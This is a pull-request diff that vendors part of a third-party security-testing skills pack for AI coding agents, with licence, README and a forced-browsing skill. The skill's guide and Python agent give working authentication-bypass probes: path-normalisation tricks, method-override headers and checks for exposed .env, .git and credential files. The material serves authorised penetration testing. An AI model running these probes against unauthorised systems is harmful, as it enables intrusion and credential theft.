### PR TITLE
docs: security testing playbook + vendored skills subset for peers

### DIFF
--- a/security/skills/LICENSE
+++ b/security/skills/LICENSE
@@ -1,0 +1,201 @@
+
+                                 Apache License
+                           Version 2.0, January 2004
+                        http://www.apache.org/licenses/
+
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+      "License" shall mean the terms and conditions for use, reproduction,
+      and distribution as defined by Sections 1 through 9 of this document.
+
+      "Licensor" shall mean the copyright owner or entity authorized by
+      the copyright owner that is granting the License.
+
+      "Legal Entity" shall mean the union of the acting entity and all
+      other entities that control, are controlled by, or are under common
+      control with that entity. For the purposes of this definition,
+      "control" means (i) the power, direct or indirect, to cause the
+      direction or management of such entity, whether by contract or
+      otherwise, or (ii) ownership of fifty percent (50%) or more of the
+      outstanding shares, or (iii) beneficial ownership of such entity.
+
+      "You" (or "Your") shall mean an individual or Legal Entity
+      exercising permissions granted by this License.
+
+      "Source" form shall mean the preferred form for making modifications,
+      including but not limited to software source code, documentation
+      source, and configuration files.
+
+      "Object" form shall mean any form resulting from mechanical
+      transformation or translation of a Source form, including but
+      not limited to compiled object code, generated documentation,
+      and conversions to other media types.
+
+      "Work" shall mean the work of authorship, whether in Source or
+      Object form, made available under the License, as indicated by a
+      copyright notice that is included in or attached to the work
+      (an example is provided in the Appendix below).
+
+      "Derivative Works" shall mean any work, whether in Source or Object
+      form, that is based on (or derived from) the Work and for which the
+      editorial revisions, annotations, elaborations, or other modifications
+      represent, as a whole, an original work of authorship. For the purposes
+      of this License, Derivative Works shall not include works that remain
+      separable from, or merely link (or bind by name) to the interfaces of,
+      the Work and Derivative Works thereof.
+
+      "Contribution" shall mean any work of authorship, including
+      the original version of the Work and any modifications or additions
+      to that Work or Derivative Works thereof, that is intentionally
+      submitted to the Licensor for inclusion in the Work by the copyright owner
+      or by an individual or Legal Entity authorized to submit on behalf of
+      the copyright owner. For the purposes of this definition, "submitted"
+      means any form of electronic, verbal, or written communication sent
+      to the Licensor or its representatives, including but not limited to
+      communication on electronic mailing lists, source code control systems,
+      and issue tracking systems that are managed by, or on behalf of, the
+      Licensor for the purpose of discussing and improving the Work, but
+      excluding communication that is conspicuously marked or otherwise
+      designated in writing by the copyright owner as "Not a Contribution."
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity
+      on behalf of whom a Contribution has been received by the Licensor and
+      subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      copyright license to reproduce, prepare Derivative Works of,
+      publicly display, publicly perform, sublicense, and distribute the
+      Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      (except as stated in this section) patent license to make, have made,
+      use, offer to sell, sell, import, and otherwise transfer the Work,
+      where such license applies only to those patent claims licensable
+      by such Contributor that are necessarily infringed by their
+      Contribution(s) alone or by combination of their Contribution(s)
+      with the Work to which such Contribution(s) was submitted. If You
+      institute patent litigation against any entity (including a
+      cross-claim or counterclaim in a lawsuit) alleging that the Work
+      or a Contribution incorporated within the Work constitutes direct
+      or contributory patent infringement, then any patent licenses
+      granted to You under this License for that Work shall terminate
+      as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the
+      Work or Derivative Works thereof in any medium, with or without
+      modifications, and in Source or Object form, provided that You
+      meet the following conditions:
+
+      (a) You must give any other recipients of the Work or
+          Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices
+          stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works
+          that You distribute, all copyright, patent, trademark, and
+          attribution notices from the Source form of the Work,
+          excluding those notices that do not pertain to any part of
+          the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its
+          distribution, then any Derivative Works that You distribute must
+          include a readable copy of the attribution notices contained
+          within such NOTICE file, excluding any notices that do not
+          pertain to any part of the Derivative Works, in at least one
+          of the following places: within a NOTICE text file distributed
+          as part of the Derivative Works; within the Source form or
+          documentation, if provided along with the Derivative Works; or,
+          within a display generated by the Derivative Works, if and
+          wherever such third-party notices normally appear. The contents
+          of the NOTICE file are for informational purposes only and
+          do not modify the License. You may add Your own attribution
+          notices within Derivative Works that You distribute, alongside
+          or as an addendum to the NOTICE text from the Work, provided
+          that such additional attribution notices cannot be construed
+          as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and
+      may provide additional or different license terms and conditions
+      for use, reproduction, or distribution of Your modifications, or
+      for any such Derivative Works as a whole, provided Your use,
+      reproduction, and distribution of the Work otherwise complies with
+      the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise,
+      any Contribution intentionally submitted for inclusion in the Work
+      by You to the Licensor shall be under the terms and conditions of
+      this License, without any additional terms or conditions.
+      Notwithstanding the above, nothing herein shall supersede or modify
+      the terms of any separate license agreement you may have executed
+      with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade
+      names, trademarks, service marks, or product names of the Licensor,
+      except as required for reasonable and customary use in describing the
+      origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or
+      agreed to in writing, Licensor provides the Work (and each
+      Contributor provides its Contributions) on an "AS IS" BASIS,
+      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+      implied, including, without limitation, any warranties or conditions
+      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+      PARTICULAR PURPOSE. You are solely responsible for determining the
+      appropriateness of using or redistributing the Work and assume any
+      risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory,
+      whether in tort (including negligence), contract, or otherwise,
+      unless required by applicable law (such as deliberate and grossly
+      negligent acts) or agreed to in writing, shall any Contributor be
+      liable to You for damages, including any direct, indirect, special,
+      incidental, or consequential damages of any character arising as a
+      result of this License or out of the use or inability to use the
+      Work (including but not limited to damages for loss of goodwill,
+      work stoppage, computer failure or malfunction, or any and all
+      other commercial damages or losses), even if such Contributor
+      has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing
+      the Work or Derivative Works thereof, You may choose to offer,
+      and charge a fee for, acceptance of support, warranty, indemnity,
+      or other liability obligations and/or rights consistent with this
+      License. However, in accepting such obligations, You may act only
+      on Your own behalf and on Your sole responsibility, not on behalf
+      of any other Contributor, and only if You agree to indemnify,
+      defend, and hold each Contributor harmless for any liability
+      incurred by, or claims asserted against, such Contributor by reason
+      of your accepting any such warranty or additional liability.
+
+   END OF TERMS AND CONDITIONS
+
+   APPENDIX: How to apply the Apache License to your work.
+
+      To apply the Apache License to your work, attach the following
+      boilerplate notice, with the fields enclosed by brackets "[]"
+      replaced with your own identifying information. (Don't include
+      the brackets!)  The text should be enclosed in the appropriate
+      comment syntax for the file format. Please do not remove or change
+      the license header comment from a contributed file except when
+      necessary.
+
+   Copyright 2026 mukul975
+
+   Licensed under the Apache License, Version 2.0 (the "License");
+   you may not use this file except in compliance with the License.
+   You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+   Unless required by applicable law or agreed to in writing, software
+   distributed under the License is distributed on an "AS IS" BASIS,
+   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+   See the License for the specific language governing permissions and
+   limitations under the License.

--- a/security/skills/README.md
+++ b/security/skills/README.md
@@ -1,0 +1,96 @@
+# Vendored security-testing skills
+
+This directory contains a **curated, vendored subset** of third-party Claude Code
+"skills" used to security-test DataCollect. They are copied here so peers can
+re-run the assessment without pulling the full upstream pack.
+
+See [How to Re-run the Security Testing](../../website/docs/how-to/security-testing.md)
+for the workflow that uses these skills.
+
+## Provenance & license
+
+- **Source:** https://github.com/mukul975/Anthropic-Cybersecurity-Skills
+- **Pinned commit:** `673da1f3b0b7be34ffc9624ef3858fe45f1c3bed`
+- **License:** Apache-2.0 — see [`LICENSE`](./LICENSE). DataCollect is also
+  Apache-2.0, so redistribution here is compatible. Files are vendored verbatim;
+  the upstream Apache-2.0 terms and attribution are retained via this notice and
+  the bundled `LICENSE`.
+
+> **Not affiliated with Anthropic.** Despite the upstream repository name, this
+> is a community-maintained pack and is not published, endorsed, or reviewed by
+> Anthropic. Treat it as untrusted third-party content.
+
+## Safety
+
+Several skills are **offensive** (SQL injection, SSRF, JWT forgery, access-control
+bypass). Their `scripts/` send attack payloads. Run them **only** against a local
+stack or a system you are explicitly authorized to test. The SSRF skills contain
+hardcoded cloud-metadata and loopback payload targets by design — these are the
+strings a tester sends to their own target, not calls the scripts make on their
+own.
+
+## What's here
+
+24 skills mapped to DataCollect's stack (TypeScript, Express + PostgreSQL, Vue,
+JWT, multi-tenant, Docker, GitHub Actions):
+
+**Web application security**
+- `exploiting-sql-injection-vulnerabilities`
+- `performing-second-order-sql-injection`
+- `performing-ssrf-vulnerability-exploitation`
+- `performing-blind-ssrf-exploitation`
+- `testing-for-xss-vulnerabilities`
+- `testing-for-sensitive-data-exposure`
+- `performing-security-headers-audit`
+
+**API security**
+- `testing-api-for-broken-object-level-authorization`
+- `testing-for-json-web-token-vulnerabilities`
+- `performing-jwt-none-algorithm-attack`
+- `exploiting-jwt-algorithm-confusion-attack`
+- `testing-api-for-mass-assignment-vulnerability`
+- `exploiting-excessive-data-exposure-in-api`
+- `performing-api-rate-limiting-bypass`
+- `detecting-api-enumeration-attacks`
+
+**Identity & access management**
+- `testing-for-broken-access-control`
+- `exploiting-broken-function-level-authorization`
+- `bypassing-authentication-with-forced-browsing`
+
+**DevSecOps**
+- `securing-github-actions-workflows`
+- `detecting-supply-chain-attacks-in-ci-cd`
+- `implementing-secret-scanning-with-gitleaks`
+- `performing-sca-dependency-scanning-with-snyk`
+- `scanning-containers-with-trivy-in-cicd`
+- `implementing-semgrep-for-custom-sast-rules`
+
+## Using a skill with Claude Code
+
+Copy the skill directory into your Claude Code skills folder so it is discovered:
+
+```bash
+mkdir -p .claude/skills
+cp -r security/skills/testing-api-for-broken-object-level-authorization .claude/skills/
+```
+
+`.claude/skills/` is git-ignored for personal use; do not commit activated copies.
+To pull the entire upstream pack instead, run
+`npx skills add mukul975/Anthropic-Cybersecurity-Skills`.
+
+## Updating
+
+Re-vendor from the pinned upstream commit (or a newer one) and update the commit
+hash above:
+
+```bash
+tmp=$(mktemp -d)
+git clone --depth 1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git "$tmp"
+for d in security/skills/*/; do
+  name=$(basename "$d")
+  rm -rf "$d" && cp -r "$tmp/skills/$name" "$d" && rm -f "$d/LICENSE"
+done
+cp "$tmp/LICENSE" security/skills/LICENSE
+rm -rf "$tmp"
+```

--- a/security/skills/bypassing-authentication-with-forced-browsing/SKILL.md
+++ b/security/skills/bypassing-authentication-with-forced-browsing/SKILL.md
@@ -1,0 +1,284 @@
+---
+name: bypassing-authentication-with-forced-browsing
+description: Discovering and accessing unprotected pages, APIs, and administrative
+  interfaces by enumerating URLs and bypassing authentication controls during authorized
+  security assessments.
+domain: cybersecurity
+subdomain: web-application-security
+tags:
+- penetration-testing
+- authentication-bypass
+- forced-browsing
+- ffuf
+- directory-enumeration
+- owasp
+version: '1.0'
+author: mahipal
+license: Apache-2.0
+nist_csf:
+- PR.PS-01
+- ID.RA-01
+- PR.DS-10
+- DE.CM-01
+mitre_attack:
+- T1190
+- T1083
+- T1087
+---
+
+# Bypassing Authentication with Forced Browsing
+
+## When to Use
+
+- During authorized penetration tests to discover hidden or unprotected administrative pages
+- When testing whether authentication is consistently enforced across all application endpoints
+- For identifying backup files, configuration files, and debug interfaces left exposed in production
+- When assessing access control on API endpoints that should require authentication
+- During security audits to validate that all sensitive resources enforce session validation
+
+## Prerequisites
+
+- **Authorization**: Written penetration testing agreement covering directory enumeration
+- **ffuf**: Fast web fuzzer (`go install github.com/ffuf/ffuf/v2@latest`)
+- **Gobuster**: Directory brute-force tool (`apt install gobuster`)
+- **Burp Suite**: For intercepting and analyzing requests and responses
+- **Wordlists**: SecLists collection (`git clone https://github.com/danielmiessler/SecLists.git`)
+- **Target access**: Network connectivity and valid test credentials for authenticated comparison
+
+## Workflow
+
+### Step 1: Enumerate Hidden Directories and Files
+
+Use ffuf or Gobuster to discover paths not linked in the application's navigation.
+
+```bash
+# Directory enumeration with ffuf
+ffuf -u https://target.example.com/FUZZ \
+  -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
+  -mc 200,301,302,403 \
+  -fc 404 \
+  -o results-dirs.json -of json \
+  -t 50 -rate 100
+
+# File enumeration with common extensions
+ffuf -u https://target.example.com/FUZZ \
+  -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt \
+  -e .php,.asp,.aspx,.jsp,.html,.js,.json,.xml,.bak,.old,.txt,.cfg,.conf,.env \
+  -mc 200,301,302,403 \
+  -fc 404 \
+  -o results-files.json -of json \
+  -t 50 -rate 100
+
+# Gobuster for directory enumeration
+gobuster dir -u https://target.example.com \
+  -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \
+  -s "200,204,301,302,307,403" \
+  -x php,asp,aspx,jsp,html \
+  -o gobuster-results.txt \
+  -t 50
+```
+
+### Step 2: Discover Administrative and Debug Interfaces
+
+Target common administrative paths and debug endpoints.
+
+```bash
+# Admin panel enumeration
+ffuf -u https://target.example.com/FUZZ \
+  -w /usr/share/seclists/Discovery/Web-Content/common.txt \
+  -mc 200,301,302 \
+  -t 50 -rate 100
+
+# Common admin paths to check manually:
+# /admin, /administrator, /admin-panel, /wp-admin
+# /cpanel, /phpmyadmin, /adminer, /manager
+# /console, /debug, /actuator, /swagger-ui
+# /graphql, /graphiql, /.env, /server-status
+
+# API endpoint discovery
+ffuf -u https://target.example.com/api/FUZZ \
+  -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt \
+  -mc 200,201,204,301,302,401,403 \
+  -fc 404 \
+  -o api-results.json -of json
+
+# Check for Spring Boot Actuator endpoints
+for endpoint in env health info beans configprops mappings trace; do
+  curl -s -o /dev/null -w "%{http_code} /actuator/$endpoint\n" \
+    "https://target.example.com/actuator/$endpoint"
+done
+```
+
+### Step 3: Test Authentication Enforcement on Discovered Endpoints
+
+Compare responses between unauthenticated and authenticated requests.
+
+```bash
+# Test without authentication
+curl -s -o /dev/null -w "%{http_code}" \
+  "https://target.example.com/admin/dashboard"
+
+# Test with valid session cookie
+curl -s -o /dev/null -w "%{http_code}" \
+  -b "session=valid_session_token_here" \
+  "https://target.example.com/admin/dashboard"
+
+# Automated check: compare response sizes
+# Unauthenticated request
+curl -s "https://target.example.com/admin/users" | wc -c
+
+# Authenticated request
+curl -s -b "session=valid_token" \
+  "https://target.example.com/admin/users" | wc -c
+
+# If both return similar content, authentication is not enforced
+
+# Test with Burp Intruder: send a list of discovered URLs
+# without cookies and flag any 200 responses
+```
+
+### Step 4: Test HTTP Method-Based Authentication Bypass
+
+Some applications only enforce authentication for specific HTTP methods.
+
+```bash
+# Test different HTTP methods on protected endpoints
+for method in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE; do
+  echo -n "$method: "
+  curl -s -o /dev/null -w "%{http_code}" \
+    -X "$method" "https://target.example.com/admin/settings"
+done
+
+# Test HTTP method override headers
+curl -s -o /dev/null -w "%{http_code}" \
+  -X POST \
+  -H "X-HTTP-Method-Override: GET" \
+  "https://target.example.com/admin/settings"
+
+curl -s -o /dev/null -w "%{http_code}" \
+  -H "X-Original-Method: GET" \
+  -H "X-Rewrite-URL: /admin/settings" \
+  "https://target.example.com/"
+```
+
+### Step 5: Test Path Traversal and URL Normalization Bypass
+
+Exploit URL parsing differences to bypass path-based authentication rules.
+
+```bash
+# Path normalization bypass attempts
+curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard"
+curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/ADMIN/dashboard"
+curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/./dashboard"
+curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/public/../admin/dashboard"
+curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin%2fdashboard"
+curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/;/admin/dashboard"
+curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin;anything/dashboard"
+curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/.;/admin/dashboard"
+
+# Double URL encoding
+curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/%2561dmin/dashboard"
+
+# Trailing characters
+curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard/"
+curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard.json"
+curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard%00"
+```
+
+### Step 6: Discover Backup and Configuration Files
+
+Search for sensitive files inadvertently exposed on the web server.
+
+```bash
+# Backup file discovery
+ffuf -u https://target.example.com/FUZZ \
+  -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt \
+  -e .bak,.old,.orig,.save,.swp,.tmp,.dist,.config,.sql,.gz,.tar,.zip \
+  -mc 200 -t 50 -rate 100
+
+# Common sensitive files
+for file in .env .git/config .git/HEAD .svn/entries \
+  web.config wp-config.php.bak config.php.old \
+  database.yml .htpasswd server-status phpinfo.php \
+  robots.txt sitemap.xml crossdomain.xml; do
+  status=$(curl -s -o /dev/null -w "%{http_code}" \
+    "https://target.example.com/$file")
+  if [ "$status" != "404" ]; then
+    echo "FOUND ($status): $file"
+  fi
+done
+
+# Git repository exposure check
+curl -s "https://target.example.com/.git/HEAD"
+# If this returns "ref: refs/heads/main", the git repo is exposed
+```
+
+## Key Concepts
+
+| Concept | Description |
+|---------|-------------|
+| **Forced Browsing** | Directly accessing URLs that are not linked but exist on the server |
+| **Directory Enumeration** | Brute-forcing directory and file names against a wordlist to discover hidden content |
+| **Authentication Bypass** | Accessing protected resources without valid credentials due to missing access checks |
+| **Path Normalization** | Exploiting differences in how web servers and application frameworks parse URL paths |
+| **Method-based Bypass** | Using alternative HTTP methods (PUT, DELETE) that may not have authentication checks |
+| **Information Disclosure** | Exposure of sensitive configuration files, backups, or debug interfaces |
+| **Defense in Depth** | Layered security controls where authentication is enforced at multiple levels |
+
+## Tools & Systems
+
+| Tool | Purpose |
+|------|---------|
+| **ffuf** | Fast web fuzzer for directory, file, and parameter enumeration |
+| **Gobuster** | Directory and DNS brute-forcing tool written in Go |
+| **Feroxbuster** | Recursive content discovery tool with automatic recursion |
+| **DirBuster** | OWASP Java-based directory brute-force tool with GUI |
+| **Burp Suite** | HTTP proxy for request interception and automated scanning |
+| **SecLists** | Comprehensive collection of wordlists for security testing |
+
+## Common Scenarios
+
+### Scenario 1: Exposed Admin Panel
+An admin panel at `/admin/` is only hidden by not being linked in the navigation. Direct URL access reveals the full administrative interface without any authentication check.
+
+### Scenario 2: Unprotected API Endpoints
+API endpoints at `/api/v1/users` and `/api/v1/settings` require authentication in the frontend application but the backend API does not enforce session validation, allowing unauthenticated direct access.
+
+### Scenario 3: Backup File Containing Credentials
+A developer left `config.php.bak` on the production server. This backup file contains database credentials in plaintext, discovered through extension-based enumeration.
+
+### Scenario 4: Spring Boot Actuator Exposure
+The `/actuator/env` endpoint is exposed without authentication, revealing environment variables including database connection strings, API keys, and secrets.
+
+## Output Format
+
+```
+## Forced Browsing / Authentication Bypass Finding
+
+**Vulnerability**: Missing Authentication on Administrative Interface
+**Severity**: Critical (CVSS 9.1)
+**Location**: /admin/dashboard (GET, no authentication required)
+**OWASP Category**: A01:2021 - Broken Access Control
+
+### Discovered Unprotected Resources
+| Path | Status | Auth Required | Content |
+|------|--------|---------------|---------|
+| /admin/dashboard | 200 | No | Full admin panel |
+| /admin/users | 200 | No | User management |
+| /actuator/env | 200 | No | Environment variables |
+| /config.php.bak | 200 | No | Database credentials |
+| /.git/HEAD | 200 | No | Git repository metadata |
+
+### Impact
+- Unauthenticated access to administrative functions
+- Ability to create, modify, and delete user accounts
+- Exposure of database credentials and API keys
+- Full source code disclosure via exposed Git repository
+
+### Recommendation
+1. Implement authentication checks at the server/middleware level for all admin routes
+2. Remove backup files, debug endpoints, and version control metadata from production
+3. Configure web server to deny access to sensitive file extensions (.bak, .old, .env, .git)
+4. Implement IP-based access restrictions for administrative interfaces
+5. Use a reverse proxy to restrict access to internal-only endpoints
+```

--- a/security/skills/bypassing-authentication-with-forced-browsing/references/api-reference.md
+++ b/security/skills/bypassing-authentication-with-forced-browsing/references/api-reference.md
@@ -1,0 +1,63 @@
+# API Reference: Forced Browsing Authentication Bypass Agent
+
+## Overview
+
+Tests web applications for unprotected endpoints, authentication bypass via HTTP methods and path normalization, and exposed sensitive files. For authorized penetration testing only.
+
+## Dependencies
+
+| Package | Version | Purpose |
+|---------|---------|---------|
+| requests | >=2.28 | HTTP requests to target endpoints |
+
+## CLI Usage
+
+```bash
+# Test common admin paths
+python agent.py --target https://target.example.com --admin-paths --session-cookie <token>
+
+# Test with custom wordlist
+python agent.py --target https://target.example.com --wordlist /path/to/wordlist.txt
+```
+
+## Arguments
+
+| Argument | Required | Description |
+|----------|----------|-------------|
+| `--target` | Yes | Target base URL |
+| `--wordlist` | No | Path to directory/file wordlist |
+| `--session-cookie` | No | Valid session cookie for authenticated comparison |
+| `--admin-paths` | No | Use built-in common admin path list |
+| `--output` | No | Output file (default: `forced_browsing_report.json`) |
+
+## Key Functions
+
+### `test_endpoint(base_url, path, session_cookie)`
+Tests an endpoint with and without authentication, comparing response status and size to detect auth bypass.
+
+### `enumerate_directories(base_url, wordlist, session_cookie)`
+Iterates through wordlist paths, recording responses with status 200, 301, 302, or 403.
+
+### `test_http_method_bypass(base_url, path)`
+Tests GET, POST, PUT, DELETE, PATCH, OPTIONS, HEAD on protected endpoints to find method-based bypasses.
+
+### `test_path_traversal_bypass(base_url, path)`
+Tests URL normalization variants (case changes, path traversal, encoding, semicolons) against protected paths.
+
+### `check_sensitive_files(base_url)`
+Checks for exposed `.env`, `.git`, backup files, and configuration files.
+
+### `generate_report(findings, method_results, sensitive_files)`
+Compiles all findings into a structured JSON pentest report.
+
+## Output Schema
+
+```json
+{
+  "total_endpoints_found": 15,
+  "auth_bypass_candidates": [{"path": "/admin", "unauth_status": 200}],
+  "accessible_without_auth": [...],
+  "http_method_bypass": {"/admin": {"GET": 403, "PUT": 200}},
+  "sensitive_files_exposed": [{"path": ".env", "size": 1024}]
+}
+```

--- a/security/skills/bypassing-authentication-with-forced-browsing/scripts/agent.py
+++ b/security/skills/bypassing-authentication-with-forced-browsing/scripts/agent.py
@@ -1,0 +1,182 @@
+#!/usr/bin/env python3
+# For authorized penetration testing and lab environments only
+"""Forced Browsing Authentication Bypass Agent - Tests for unprotected endpoints."""
+
+import json
+import logging
+import argparse
+from datetime import datetime
+from urllib.parse import urljoin
+
+import requests
+
+logging.basicConfig(level=logging.INFO, format="%(asctime)s [%(levelname)s] %(message)s")
+logger = logging.getLogger(__name__)
+
+DEFAULT_ADMIN_PATHS = [
+    "/admin", "/administrator", "/admin-panel", "/wp-admin", "/cpanel",
+    "/phpmyadmin", "/adminer", "/manager", "/console", "/debug",
+    "/actuator", "/actuator/env", "/actuator/health", "/actuator/beans",
+    "/swagger-ui", "/swagger-ui.html", "/api-docs", "/graphql", "/graphiql",
+    "/.env", "/server-status", "/server-info", "/.git/HEAD", "/.git/config",
+    "/web.config", "/phpinfo.php", "/robots.txt", "/sitemap.xml",
+]
+
+SENSITIVE_EXTENSIONS = [
+    ".bak", ".old", ".orig", ".save", ".swp", ".tmp", ".config",
+    ".sql", ".gz", ".tar", ".zip", ".env",
+]
+
+
+def load_wordlist(wordlist_path):
+    """Load directory/file wordlist from file."""
+    with open(wordlist_path, "r") as f:
+        return [line.strip() for line in f if line.strip() and not line.startswith("#")]
+
+
+def test_endpoint(base_url, path, session_cookie=None, timeout=10):
+    """Test a single endpoint with and without authentication."""
+    url = urljoin(base_url, path)
+    unauth_resp = requests.get(url, timeout=timeout, allow_redirects=False, verify=False)
+
+    auth_resp = None
+    if session_cookie:
+        auth_resp = requests.get(
+            url, cookies={"session": session_cookie},
+            timeout=timeout, allow_redirects=False, verify=False,
+        )
+
+    result = {
+        "path": path,
+        "url": url,
+        "unauth_status": unauth_resp.status_code,
+        "unauth_size": len(unauth_resp.content),
+    }
+    if auth_resp:
+        result["auth_status"] = auth_resp.status_code
+        result["auth_size"] = len(auth_resp.content)
+        result["auth_bypass"] = (
+            unauth_resp.status_code == 200 and auth_resp.status_code == 200
+            and abs(result["unauth_size"] - result["auth_size"]) < 100
+        )
+    return result
+
+
+def enumerate_directories(base_url, wordlist, session_cookie=None):
+    """Enumerate directories and test authentication enforcement."""
+    findings = []
+    for word in wordlist:
+        path = f"/{word}" if not word.startswith("/") else word
+        try:
+            result = test_endpoint(base_url, path, session_cookie)
+            if result["unauth_status"] in (200, 301, 302, 403):
+                findings.append(result)
+                logger.info(
+                    "Found: %s (status: %d, size: %d)",
+                    path, result["unauth_status"], result["unauth_size"],
+                )
+        except requests.RequestException:
+            continue
+    return findings
+
+
+def test_http_method_bypass(base_url, path):
+    """Test HTTP method-based authentication bypass."""
+    methods = ["GET", "POST", "PUT", "DELETE", "PATCH", "OPTIONS", "HEAD"]
+    results = {}
+    for method in methods:
+        try:
+            resp = requests.request(method, urljoin(base_url, path), timeout=10, verify=False)
+            results[method] = resp.status_code
+        except requests.RequestException:
+            results[method] = None
+    logger.info("Method bypass test for %s: %s", path, results)
+    return results
+
+
+def test_path_traversal_bypass(base_url, path):
+    """Test path normalization bypass techniques."""
+    variants = [
+        path,
+        path.upper(),
+        path.replace("/", "/./"),
+        f"/public/..{path}",
+        path.replace("/", "%2f"),
+        f"/;{path}",
+        f"/.;{path}",
+        f"{path}/",
+        f"{path}.json",
+    ]
+    results = []
+    for variant in variants:
+        try:
+            resp = requests.get(urljoin(base_url, variant), timeout=10, verify=False)
+            results.append({"path": variant, "status": resp.status_code, "size": len(resp.content)})
+        except requests.RequestException:
+            continue
+    return results
+
+
+def check_sensitive_files(base_url):
+    """Check for exposed backup and configuration files."""
+    sensitive_paths = [
+        ".env", ".git/HEAD", ".git/config", "web.config", "wp-config.php.bak",
+        "config.php.old", ".htpasswd", "database.yml", "phpinfo.php",
+    ]
+    exposed = []
+    for path in sensitive_paths:
+        try:
+            resp = requests.get(urljoin(base_url, path), timeout=10, verify=False)
+            if resp.status_code == 200 and len(resp.content) > 0:
+                exposed.append({"path": path, "status": resp.status_code, "size": len(resp.content)})
+                logger.warning("EXPOSED: %s (size: %d bytes)", path, len(resp.content))
+        except requests.RequestException:
+            continue
+    return exposed
+
+
+def generate_report(findings, method_results, sensitive_files):
+    """Generate pentest finding report for forced browsing results."""
+    report = {
+        "timestamp": datetime.utcnow().isoformat(),
+        "total_endpoints_found": len(findings),
+        "auth_bypass_candidates": [f for f in findings if f.get("auth_bypass")],
+        "accessible_without_auth": [f for f in findings if f["unauth_status"] == 200],
+        "http_method_bypass": method_results,
+        "sensitive_files_exposed": sensitive_files,
+    }
+    bypasses = len(report["auth_bypass_candidates"])
+    logger.info("Report: %d endpoints, %d auth bypasses, %d sensitive files",
+                len(findings), bypasses, len(sensitive_files))
+    return report
+
+
+def main():
+    parser = argparse.ArgumentParser(description="Forced Browsing Authentication Bypass Agent")
+    parser.add_argument("--target", required=True, help="Target base URL")
+    parser.add_argument("--wordlist", help="Path to wordlist file")
+    parser.add_argument("--session-cookie", help="Valid session cookie for auth comparison")
+    parser.add_argument("--admin-paths", action="store_true", help="Test common admin paths")
+    parser.add_argument("--output", default="forced_browsing_report.json")
+    args = parser.parse_args()
+
+    wordlist = DEFAULT_ADMIN_PATHS if args.admin_paths else []
+    if args.wordlist:
+        wordlist = load_wordlist(args.wordlist)
+
+    findings = enumerate_directories(args.target, wordlist, args.session_cookie)
+    method_results = {}
+    for f in findings:
+        if f["unauth_status"] in (401, 403):
+            method_results[f["path"]] = test_http_method_bypass(args.target, f["path"])
+
+    sensitive = check_sensitive_files(args.target)
+    report = generate_report(findings, method_results, sensitive)
+
+    with open(args.output, "w") as f:
+        json.dump(report, f, indent=2)
+    logger.info("Report saved to %s", args.output)
+
+
+if __name__ == "__main__":
+    main()

--- a/security/skills/detecting-api-enumeration-attacks/SKILL.md
+++ b/security/skills/detecting-api-enumeration-attacks/SKILL.md
@@ -1,0 +1,427 @@
+---
+name: detecting-api-enumeration-attacks
+description: Detect and prevent API enumeration attacks including BOLA and IDOR exploitation
+  by monitoring sequential identifier access patterns and authorization failures.
+domain: cybersecurity
+subdomain: api-security
+tags:
+- api-security
+- enumeration
+- bola
+- idor
+- broken-object-level-authorization
+- owasp-api-top-10
+- access-control
+- rate-limiting
+version: '1.0'
+author: mahipal
+license: Apache-2.0
+nist_csf:
+- PR.PS-01
+- ID.RA-01
+- PR.DS-10
+- DE.CM-01
+mitre_attack:
+- T1595
+- T1595.002
+- T1046
+- T1190
+- T1087
+---
+
+# Detecting API Enumeration Attacks
+
+## Overview
+
+API enumeration attacks occur when attackers systematically probe API endpoints with sequential or predictable identifiers to discover and access unauthorized resources. Broken Object Level Authorization (BOLA), ranked as API1:2023 in the OWASP API Security Top 10, is the most critical API vulnerability. Attackers manipulate object identifiers (user IDs, order numbers, account references) in API requests to bypass authorization and access other users' data. Detection requires monitoring for patterns of rapid sequential access attempts, authorization failures, and abnormal API usage behavior.
+
+
+## When to Use
+
+- When investigating security incidents that require detecting api enumeration attacks
+- When building detection rules or threat hunting queries for this domain
